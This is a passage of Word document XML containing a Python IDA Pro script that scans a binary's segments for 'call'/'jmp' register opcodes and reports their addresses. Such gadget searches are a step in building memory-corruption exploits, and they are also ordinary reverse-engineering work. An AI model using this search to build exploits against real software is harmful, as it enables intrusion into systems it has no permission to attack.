      <w:proofErr w:type="gram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ax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="32FB3311" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\xd3</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69E2E6B8" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\xe3</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gram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bx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="40BA0EFD" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\xd1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3CDDDA33" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\xe1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gram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cx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2608ABA6" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\xd2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="35ADBFF8" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\xe2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gram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dx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="65AA5D91" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\xd7</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="53D460A9" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\xe7</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gram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di</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="158D1D32" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\xd6</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61A5CCEC" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\xe6</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>",  #</w:t>
      </w:r>
      <w:proofErr w:type="gram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esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="30B357B2" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3818F5" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62227247" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E86F09F" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>find_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>opcodes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C9F400" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    result = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A2A7F3" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2211EA2C" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    for seg in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>idautils.Segments</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24516C1C" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>seg_start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>idc.get_segm_start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(seg)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AD24A5" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>seg_end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>idc.get_segm_end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(seg)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2763A9CE" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>current_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>seg_start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="357611D6" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D971BF5" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        while </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>current_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &lt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>seg_end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791837FA" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>instr_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, opcode in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OPCODES.items</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312877F1" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>idc.get_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>bytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>current_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(opcode)) == opcode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788E37C8" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>instr_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> not in result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FEEEB1" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        result[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>instr_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>] = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0917B9AC" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    result[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>instr_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>].append</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>current_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3AA5E5" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>current_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>idc.next</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_head</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>current_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>seg_end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFB2BAE" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70C799AF" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345FC8DC" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59A9642E" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="527524C2" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>print_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>report</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">title, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>instructions_dict</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730FFD77" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print(f'\n{title}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477BBA03" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'_' * 60)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709BE1A0" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="272B9D7B" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>instructions_dict</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F452FF4" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"No instructions found")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4D8D4B" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36322E12" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E1E2861" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    for instruction, addresses in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>instructions_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>dict.items</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FFE1CA" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>f'\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nInstruction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: {instruction}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6485BFF9" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print('Addresses:')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A229922" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ea</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in addresses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5999DA" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>f'  0x{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ea:X</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346FF446" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45FADE1F" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44282A0C" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E1DF95" w14:textId="77777777" w:rsidR="00296514" w:rsidRDefault="00296514" w:rsidP="00296514">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>found_instructions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>find_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>opcodes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
